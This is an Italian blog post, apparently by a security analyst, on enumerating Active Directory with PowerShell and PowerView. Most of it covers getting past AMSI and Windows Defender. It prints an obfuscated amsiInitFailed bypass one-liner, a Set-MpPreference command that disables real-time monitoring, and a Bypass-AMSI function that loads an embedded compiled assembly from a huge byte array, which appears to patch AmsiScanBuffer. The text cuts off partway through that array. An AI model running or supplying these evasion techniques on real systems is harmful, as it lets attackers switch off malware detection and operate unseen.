Andrea Bruschi, Cyber Security Analyst

Domain enumeration, parte 1

Published by Andy

Per enumerare Active Directory è possibile utilizzare eseguibili nativi (c#) o classi .NET. Si può enumerare Active Directory anche senza privilegi elevati e, utilizzando powershell, è possibile per esempio utilizzare il codice seguente:

$AD = [System.DirectoryServices.ActiveDirectory.Domain]
$AD::GetCurrentDomain()

get-current-domain

(Fonte: https://itfordummies.net/2015/11/02/active-directory-trusts-powershell/)

Per agevolare l'enumerazione esistono un paio di script che sono in grado di velocizzare il processo, si tratta di PowerView e Active Directory module di Microsoft.

AMSI

AMSI sta per Anti-Malware Scan Interface ed è stato introdotto in Windows 10. Si tratta di un'interfaccia che applicazioni e servizi sono in grado di utilizzare, inviando "contenuto" ad un provider anti-malware installato sul sistema (es. Windows Defender). Per fare questo AMSI aggancia, ad esempio, il Windows Scripting Host (WSH) e PowerShell, al fine di de-offuscare e analizzare il contenuto in esecuzione. Questo contenuto viene "catturato" e inviato alla soluzione antimalware prima della sua esecuzione.

Questa è la lista di tutti i componenti che implementano AMSI su Windows 10:

Controllo dell'account utente o UAC (elevazione dell'installazione EXE, COM, MSI o ActiveX) PowerShell (script, uso interattivo e valutazione dinamica del codice) Windows Script Host (wscript.exe e cscript.exe) JavaScript e VBScript Macro VBA per ufficio

Di seguito una rappresentazione dell'architettura dell'AMSI.

Questa breve introduzione ad AMSI serve per dire che al momento dell'importazione di PowerView o simili, ci sono elevate probabilità che venga rilevato da Windows Defender. Un metodo semplice di bypassare questo limite è quello di utilizzare PyFuscation, che si occuperà di offuscare (rinominare) tutte le funzioni, variabili, parametri di PowerView. Ovviamente sarà necessario tenere traccia dei nuovi nomi di funzione per sapere quali comandi lanciare.

Un comando popolare è il seguente:

 sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} ) 

Un altro metodo spiegato in dettaglio si trova qui:

Bypass AMSI

Sorgente

Se si hanno privilegi di amministratore si può lanciare il comando seguente:

Set-MpPreference -DisableRealtimeMonitoring $true

Ancora un altro metodo è utilizzare la seguente funzione, seguire la fonte per approfondire.

function Bypass-AMSI
{
    if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
        [Reflection.Assembly]::Load([byte[]]@(77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111, 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10, 36, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 76, 1, 3, 0, 162, 107, 61, 140, 0, 0, 0, 0, 0, 0, 0, 0, 224, 0, 34, 32, 11, 1, 48, 0, 0, 14, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 198, 44, 0, 0, 0, 32, 0, 0, 0, 64, 0, 0, 0, 0, 0, 16, 0, 32, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 3, 0, 96, 133, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 113, 44, 0, 0, 79, 0, 0, 0, 0, 64, 0, 0, 136, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 96, 0, 0, 12, 0, 0, 0, 212, 43, 0, 0, 56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 32, 0, 0, 72, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 46, 116, 101, 120, 116, 0, 0, 0, 212, 12, 0, 0, 0, 32, 0, 0, 0, 14, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 96, 46, 114, 115, 114, 99, 0, 0, 0, 136, 3, 0, 0, 0, 64, 0, 0, 0, 4, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 64, 46, 114, 101, 108, 111, 99, 0, 0, 12, 0, 0, 0, 0, 96, 0, 0, 0, 2, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 165, 44, 0, 0, 0, 0, 0, 0, 72, 0, 0, 0, 2, 0, 5, 0, 16, 33, 0, 0, 196, 10, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 19, 48, 4, 0, 170, 0, 0, 0, 1, 0, 0, 17, 114, 1, 0, 0, 112, 40, 2, 0, 0, 6, 10, 6, 126, 16, 0, 0, 10, 40, 17, 0, 0, 10, 44, 12, 114, 19, 0, 0, 112, 40, 18, 0, 0, 10, 23, 42, 6, 114, 107, 0, 0, 112, 40, 1, 0, 0, 6, 11, 7, 126, 16, 0, 0, 10, 40, 17, 0, 0, 10, 44, 12, 114, 137, 0, 0, 112, 40, 18, 0, 0, 10, 23, 42, 27, 106, 40, 19, 0, 0, 10, 12, 22, 13, 7, 8, 31, 64, 18, 3, 40, 3, 0, 0, 6, 45, 12, 114, 253, 0, 0, 112, 40, 18, 0, 0, 10, 23, 42, 25, 141, 22, 0, 0, 1, 37, 208, 1, 0, 0, 4, 40, 20, 0, 0, 10, 25, 40, 21, 0, 0, 10, 19, 4, 22, 17, 4, 25, 40, 22, 0, 0, 10, 7, 31, 27, 40, 23, 0, 0, 10, 17, 4, 25, 40, 4, 0, 0, 6, 114, 115, 1, 0, 112, 40, 18, 0, 0, 10, 22, 42, 30, 2, 40, 24, 0, 0, 10, 42, 0, 0, 66, 83, 74, 66, 1, 0, 1, 0, 0, 0, 0, 0, 12, 0, 0, 0, 118, 52, 46, 48, 46, 51, 48, 51, 49, 57, 0, 0, 0, 0, 5, 0, 108, 0, 0, 0, 28, 3, 0, 0, 35, 126, 0, 0, 136, 3, 0, 0, 0, 4, 0, 0, 35, 83, 116, 114, 105, 110, 103, 115, 0, 0, 0, 0, 136, 7, 0, 0, 196, 1, 0, 0, 35, 85, 83, 0, 76, 9, 0, 0, 16, 0, 0, 0, 35, 71, 85, 73, 68, 0, 0, 0, 92, 9, 0, 0, 104, 1, 0, 0, 35, 66, 108, 111, 98, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 1, 87, 149, 2, 52, 9, 2, 0, 0, 0, 250, 1, 51, 0, 22, 0, 0, 1, 0, 0, 0, 26, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 6, 0, 0, 0, 10, 0, 0, 0, 24, 0, 0, 0, 15, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 169, 2, 1, 0, 0, 0, 0, 0, 6, 0, 209, 1, 34, 3, 6, 0, 62, 2, 34, 3, 6, 0, 5, 1, 240, 2, 15, 0, 66, 3, 0, 0, 6, 0, 45, 1, 191, 2, 6, 0, 180, 1, 191, 2, 6, 0, 149, 1, 191, 2, 6, 0, 37, 2, 191, 2, 6, 0, 241, 1, 191, 2, 6, 0, 10, 2, 191, 2, 6, 0, 68, 1, 191, 2, 6, 0, 25, 1, 3, 3, 6, 0, 247, 0, 3, 3, 6, 0, 120, 1, 191, 2, 6, 0, 95, 1, 109, 2, 6, 0, 128, 3, 184, 2, 6, 0, 220, 0, 34, 3, 6, 0, 210, 0, 184, 2, 6, 0, 233, 2, 184, 2, 6, 0, 170, 0, 184, 2, 6, 0, 232, 2, 184, 2, 6, 0, 92, 2, 184, 2, 6, 0, 81, 3, 34, 3, 6, 0, 205, 3, 184, 2, 6, 0, 151, 0, 184, 2, 6, 0, 148, 2, 3, 3, 0, 0, 0, 0, 38, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 16, 0, 125, 0, 96, 3, 65, 0, 1, 0, 1, 0, 0, 1, 0, 0, 47, 0, 0, 0, 65, 0, 1, 0, 7, 0, 19, 1, 0, 0, 10, 0, 0, 0, 73, 0, 2, 0, 7, 0, 51, 1, 78, 0, 90, 0, 0, 0, 0, 0, 128, 0, 150, 32, 103, 3, 94, 0, 1, 0, 0, 0, 0, 0, 128, 0, 150, 32, 216, 3, 100, 0, 3, 0, 0, 0, 0, 0, 128, 0, 150, 32, 150, 3, 105, 0, 4, 0, 0, 0, 0, 0, 128, 0, 145, 32, 231, 3, 114, 0, 8, 0, 80, 32, 0, 0, 0, 0, 150, 0, 143, 0, 121, 0, 11, 0, 6, 33, 0, 0, 0, 0, 134, 24, 226, 2, 6, 0, 11, 0, 0, 0, 1, 0, 178, 0, 0, 0, 2, 0, 186, 0, 0, 0, 1, 0, 195, 0, 0, 0, 1, 0, 118, 3, 0, 0, 2, 0, 97, 2, 0, 0, 3, 0, 165, 3, 2, 0, 4, 0, 135, 3, 0, 0, 1, 0, 190, 3, 0, 0, 2, 0, 139, 0, 0, 0, 3, 0, 104, 2, 9, 0, 226, 2, 1, 0, 17, 0, 226, 2, 6, 0, 25, 0, 226, 2, 10, 0, 41, 0, 226, 2, 16, 0, 49, 0, 226, 2, 16, 0, 57, 0, 226, 2, 16, 0, 65, 0, 226, 2, 16, 0, 73, 0, 226, 2, 16, 0, 81, 0, 226, 2, 16, 0, 89, 0, 226, 2, 16, 0, 97, 0, 226, 2, 21, 0, 105, 0, 226, 2, 16, 0, 113, 0, 226, 2, 16, 0, 121, 0, 226, 2, 16, 0, 137, 0, 226, 2, 6, 0, 153, 0, 221, 2, 34, 0, 153, 0, 242, 3, 37, 0, 161, 0, 200, 0, 43, 0, 169, 0, 178, 3, 48, 0, 185, 0, 195, 3, 53, 0, 209, 0, 135, 2, 61, 0, 209, 0, 211, 3, 66, 0, 153, 0, 209, 2, 75, 0, 129, 0, 226, 2, 6, 0, 46, 0, 11, 0, 125, 0, 46, 0, 19, 0, 134, 0, 46, 0, 27, 0, 165, 0, 46, 0, 35, 0, 174, 0, 46, 0, 43, 0, 190, 0, 46, 0, 51, 0, 190, 0, 46, 0, 59, 0, 190, 0, 46, 0, 67, 0, 174, 0, 46, 0, 75, 0, 196, 0, 46, 0, 83, 0, 190, 0, 46, 0, 91, 0, 190, 0, 46, 0, 99, 0, 220, 0, 46, 0, 107, 0, 6, 1, 46, 0, 115, 0, 19, 1, 99, 0, 123, 0, 97, 1, 1, 0, 3, 0, 0, 0, 4, 0, 26, 0, 1, 0, 156, 2, 0, 1, 3, 0, 103, 3, 1, 0, 0, 1, 5, 0, 216, 3, 1, 0, 0, 1, 7, 0, 150, 3, 1, 0, 0, 1, 9, 0, 228, 3, 2, 0, 204, 44, 0, 0, 1, 0, 4, 128, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 119, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 81, 0, 130, 0, 0, 0, 0, 0, 4, 0, 3, 0, 0, 0, 0, 0, 0, 107, 101, 114, 110, 101, 108, 51, 50, 0, 95, 95, 83, 116, 97, 116, 105, 99, 65, 114, 114, 97, 121, 73, 110, 105, 116, 84, 121, 112, 101, 83, 105, 122, 101, 61, 51, 0, 60, 77, 111, 100, 117, 108, 101, 62, 0, 60, 80, 114, 105, 118, 97, 116, 101, 73, 109, 112, 108, 101, 109, 101, 110, 116, 97, 116, 105, 111, 110, 68, 101, 116, 97, 105, 108, 115, 62, 0, 53, 49, 67, 65, 70, 66, 52, 56, 49, 51, 57, 66, 48, 50, 69, 48, 54, 49, 68, 52, 57, 49, 57, 67, 53, 49, 55, 54, 54, 50, 49, 66, 70, 56, 55, 68, 65, 67, 69, 68, 0, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 0, 109, 115, 99, 111, 114, 108, 105, 98, 0, 115, 114, 99, 0, 68, 105, 115, 97, 98, 108, 101, 0, 82, 117, 110, 116, 105, 109, 101, 70, 105, 101, 108, 100, 72, 97, 110, 100, 108, 101, 0, 67, 111, 110, 115, 111, 108, 101, 0, 104, 77, 111, 100, 117, 108, 101, 0, 112, 114, 111, 99, 78, 97, 109, 101, 0, 110, 97, 109, 101, 0, 87, 114, 105, 116, 101, 76, 105, 110, 101, 0, 86, 97, 108, 117, 101, 84, 121, 112, 101, 0, 67, 111, 109, 112, 105, 108, 101, 114, 71, 101, 110, 101, 114, 97, 116, 101, 100, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 71, 117, 105, 100, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 68, 101, 98, 117, 103, 103, 97, 98, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 67, 111, 109, 86, 105, 115, 105, 98, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 84, 105, 116, 108, 101, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 84, 114, 97, 100, 101, 109, 97, 114, 107, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 84, 97, 114, 103, 101, 116, 70, 114, 97, 109, 101, 119, 111, 114, 107, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 70, 105, 108, 101, 86, 101, 114, 115, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 67, 111, 110, 102, 105, 103, 117, 114, 97, 116, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 68, 101, 115, 99, 114, 105, 112, 116, 105, 111, 110, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 67, 111, 109, 112, 105, 108, 97, 116, 105, 111, 110, 82, 101, 108, 97, 120, 97, 116, 105, 111, 110, 115, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 80, 114, 111, 100, 117, 99, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 67, 111, 112, 121, 114, 105, 103, 104, 116, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 65, 115, 115, 101, 109, 98, 108, 121, 67, 111, 109, 112, 97, 110, 121, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 82, 117, 110, 116, 105, 109, 101, 67, 111, 109, 112, 97, 116, 105, 98, 105, 108, 105, 116, 121, 65, 116, 116, 114, 105, 98, 117, 116, 101, 0, 66, 121, 116, 101, 0, 100, 119, 83, 105, 122, 101, 0, 115, 105, 122, 101, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 86, 101, 114, 115, 105, 111, 110, 105, 110, 103, 0, 65, 108, 108, 111, 99, 72, 71, 108, 111, 98, 97, 108, 0, 77, 97, 114, 115, 104, 97, 108, 0, 75, 101, 114, 110, 101, 108, 51, 50, 46, 100, 108, 108, 0, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 46, 100, 108, 108, 0, 83, 121, 115, 116, 101, 109, 0, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 0, 111, 112, 95, 65, 100, 100, 105, 116, 105, 111, 110, 0, 90, 101, 114, 111, 0, 46, 99, 116, 111, 114, 0, 85, 73, 110, 116, 80, 116, 114, 0, 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 73, 110, 116, 101, 114, 111, 112, 83, 101, 114, 118, 105, 99, 101, 115, 0, 83, 121, 115, 116, 101, 109, 46, 82, 117, 110, 116, 105, 109, 101, 46, 67, 111, 109, 112, 105, 108, 101, 114, 83, 101, 114, 118, 105, 99, 101, 115, 0, 68, 101, 98, 117, 103, 103, 105, 110, 103, 77, 111, 100, 101, 115, 0, 82, 117, 110, 116, 105, 109, 101, 72, 101, 108, 112, 101, 114, 115, 0, 66, 121, 112, 97, 115, 115, 0, 71, 101, 116, 80, 114, 111, 99, 65, 100, 100, 114, 101, 115, 115, 0, 108, 112, 65, 100, 100, 114, 101, 115, 115, 0, 79, 98, 106, 101, 99, 116, 0, 108, 112, 102, 108, 79, 108, 100, 80, 114, 111, 116, 101, 99, 116, 0, 86, 105, 114, 116, 117, 97, 108, 80, 114, 111, 116, 101, 99, 116, 0, 102, 108, 78, 101, 119, 80, 114, 111, 116, 101, 99, 116, 0, 111, 112, 95, 69, 120, 112, 108, 105, 99, 105, 116, 0, 100, 101, 115, 116, 0, 73, 110, 105, 116, 105, 97, 108, 105, 122, 101, 65, 114, 114, 97, 121, 0, 67, 111, 112, 121, 0, 76, 111, 97, 100, 76, 105, 98, 114, 97, 114, 121, 0, 82, 116, 108, 77, 111, 118, 101, 77, 101, 109, 111, 114, 121, 0, 111, 112, 95, 69, 113, 117, 97, 108, 105, 116, 121, 0, 0, 0, 0, 17, 97, 0, 109, 0, 115, 0, 105, 0, 46, 0, 100, 0, 108, 0, 108, 0, 0, 87, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 114, 0, 101, 0, 116, 0, 114, 0, 105, 0, 101, 0, 118, 0, 101, 0, 32, 0, 97, 0, 109, 0, 115, 0, 105, 0, 46, 0, 100, 0, 108, 0, 108, 0, 32, 0, 112, 0, 111, 0, 105, 0, 110, 0, 116, 0, 101, 0, 114, 0, 46, 0, 0, 29, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 0, 115, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 114, 0, 101, 0, 116, 0, 114, 0, 105, 0, 101, 0, 118, 0, 101, 0, 32, 0, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 102, 0, 117, 0, 110, 0, 99, 0, 116, 0, 105, 0, 111, 0, 110, 0, 32, 0, 112, 0, 111, 0, 105, 0, 110, 0, 116, 0, 101, 0, 114, 0, 0, 117, 69, 0, 82, 0, 82, 0, 79, 0, 82, 0, 58, 0, 32, 0, 67, 0, 111, 0, 117, 0, 108, 0, 100, 0, 32, 0, 110, 0, 111, 0, 116, 0, 32, 0, 99, 0, 104, 0, 97, 0, 110, 0, 103, 0, 101, 0, 32, 0, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 109, 0, 101, 0, 109, 0, 111, 0, 114, 0, 121, 0, 32, 0, 112, 0, 101, 0, 114, 0, 109, 0, 105, 0, 115, 0, 115, 0, 105, 0, 111, 0, 110, 0, 115, 0, 33, 0, 0, 77, 65, 0, 109, 0, 115, 0, 105, 0, 83, 0, 99, 0, 97, 0, 110, 0, 66, 0, 117, 0, 102, 0, 102, 0, 101, 0, 114, 0, 32, 0, 112, 0, 97, 0, 116, 0, 99, 0, 104, 0, 32, 0, 104, 0, 97, 0, 115, 0, 32, 0, 98, 0, 101, 0, 101, 0, 110, 0, 32, 0, 97, 0, 112, 0, 112, 0, 108, 0, 105, 0, 101, 0, 100, 0, 46, 0, 0, 0, 0, 0, 77, 203, 161, 57, 40, 124, 239, 68, 156, 240, 131, 50, 130, 195, 248, 87, 0, 4, 32, 1, 1, 8, 3, 32, 0, 1, 5, 32, 1, 1, 17, 17, 4, 32, 1, 1, 14, 4, 32, 1, 1, 2, 7, 7, 5, 24, 24, 25, 9, 24, 2, 6, 24, 5, 0, 2, 2, 24, 24, 4, 0, 1, 1, 14, 4, 0, 1, 25, 11, 7, 0, 2, 1, 18, 97, 17, 101, 4, 0, 1, 24, 8, 8, 0, 4, 1, 29, 5, 8, 24, 8, 5, 0, 2, 24, 24, 8, 8, 183, 122, 92, 86, 25, 52, 224, 137, 3, 6, 17, 16, 5, 0, 2, 24, 24, 14, 4, 0, 1, 24, 14, 8, 0, 4, 2, 24, 25, 9, 16, 9, 6, 0, 3, 1, 24, 24, 8, 3, 0, 0, 8, 8, 1, 0, 8, 0, 0, 0, 0, 0, 30, 1, 0, 1, 0, 84, 2, 22, 87, 114, 97, 112, 78, 111, 110, 69, 120, 99, 101, 112, 116, 105, 111, 110, 84, 104, 114, 111, 119, 115, 1, 8, 1, 0, 2, 0, 0, 0, 0, 0, 15, 1, 0, 10, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 0, 0, 5, 1, 0, 0, 0, 0, 23, 1, 0, 18, 67, 111, 112, 121, 114, 105, 103, 104, 116, 32, 194, 169, 32, 32, 50, 48, 49, 56, 0, 0, 41, 1, 0, 36, 56, 99, 97, 49, 52, 99, 52, 57, 45, 54, 52, 52, 98, 45, 52, 48, 99, 102, 45, 98, 49, 99, 55, 45, 97, 53, 98, 100, 97, 101, 98, 48, 98, 50, 99, 97, 0, 0, 12, 1, 0, 7, 49, 46, 48, 46, 48, 46, 48, 0, 0, 77, 1, 0, 28, 46, 78, 69, 84, 70, 114, 97, 109, 101, 119, 111, 114, 107, 44, 86, 101, 114, 115, 105, 111, 110, 61, 118, 52, 46, 53, 46, 50, 1, 0, 84, 14, 20, 70, 114, 97, 109, 101, 119, 111, 114, 107, 68, 105, 115, 112, 108, 97, 121, 78, 97, 109, 101, 20, 46, 78, 69, 84, 32, 70, 114, 97, 109, 101, 119, 111, 114, 107, 32, 52, 46, 53, 46, 50, 4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 221, 193, 71, 222, 0, 0, 0, 0, 2, 0, 0, 0, 101, 0, 0, 0, 12, 44, 0, 0, 12, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 82, 83, 68, 83, 105, 207, 113, 241, 18, 122, 72, 71, 173, 244, 95, 170, 153, 86, 158, 210, 1, 0, 0, 0, 67, 58, 92, 85, 115, 101, 114, 115, 92, 97, 110, 100, 114, 101, 92, 115, 111, 117, 114, 99, 101, 92, 114, 101, 112, 111, 115, 92, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 92, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 92, 111, 98, 106, 92, 82, 101, 108, 101, 97, 115, 101, 92, 66, 121, 112, 97, 115, 115, 65, 77, 83, 73, 46, 112, 100, 98, 0, 153, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 179, 44, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 165, 44, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 95, 67, 111, 114, 68, 108, 108, 77, 97, 105, 110, 0, 109, 115, 99, 111, 114, 101, 101, 46, 100, 108, 108, 0, 0, 0, 0, 0, 0, 0, 0, 255, 37, 0, 32, 0, 16, 49, 255, 144, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 16, 0, 0, 0, 24, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 48, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 72, 0, 0, 0, 88, 64, 0, 0, 44, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 44, 3, 52, 0, 0, 0, 86, 0, 83, 0, 95, 0, 86, 0, 69, 0, 82, 0, 83, 0, 73, 0, 79, 0, 78, 0, 95, 0, 73, 0, 78, 0, 70, 0, 79, 0, 0, 0, 0, 0, 189, 4, 239, 254, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 63, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 68, 0, 0, 0, 1, 0, 86, 0, 97, 0, 114, 0, 70, 0, 105, 0, 108, 0, 101, 0, 73, 0, 110, 0, 102, 0, 111, 0, 0, 0, 0, 0, 36, 0, 4, 0, 0, 0, 84, 0, 114, 0, 97, 0, 110, 0, 115, 0, 108, 0, 97, 0, 116, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 0, 0, 176, 4, 140, 2, 0, 0, 1, 0, 83, 0, 116, 0, 114, 0, 105, 0, 110, 0, 103, 0, 70, 0, 105, 0, 108, 0, 101, 0, 73, 0, 110, 0, 102, 0, 111, 0, 0, 0, 104, 2, 0, 0, 1, 0, 48, 0, 48, 0, 48, 0, 48, 0, 48, 0, 52, 0, 98, 0, 48, 0, 0, 0, 26, 0, 1, 0, 1, 0, 67, 0, 111, 0, 109, 0, 109, 0, 101, 0, 110, 0, 116, 0, 115, 0, 0, 0, 0, 0, 0, 0, 34, 0, 1, 0, 1, 0, 67, 0, 111, 0, 109, 0, 112, 0, 97, 0, 110, 0, 121, 0, 78, 0, 97, 0, 109, 0, 101, 0, 0, 0, 0, 0, 0, 0, 0, 0, 62, 0, 11, 0, 1, 0, 70, 0, 105, 0, 108, 0, 101, 0, 68, 0, 101, 0, 115, 0, 99, 0, 114, 0, 105, 0, 112, 0, 116, 0, 105, 0, 111, 0, 110, 0, 0, 0, 0, 0, 66, 0, 121, 0, 112, 0, 97, 0, 115, 0, 115, 0, 65, 0, 77, 0, 83, 0, 73, 0, 0, 0, 0, 0, 48, 0, 8, 0, 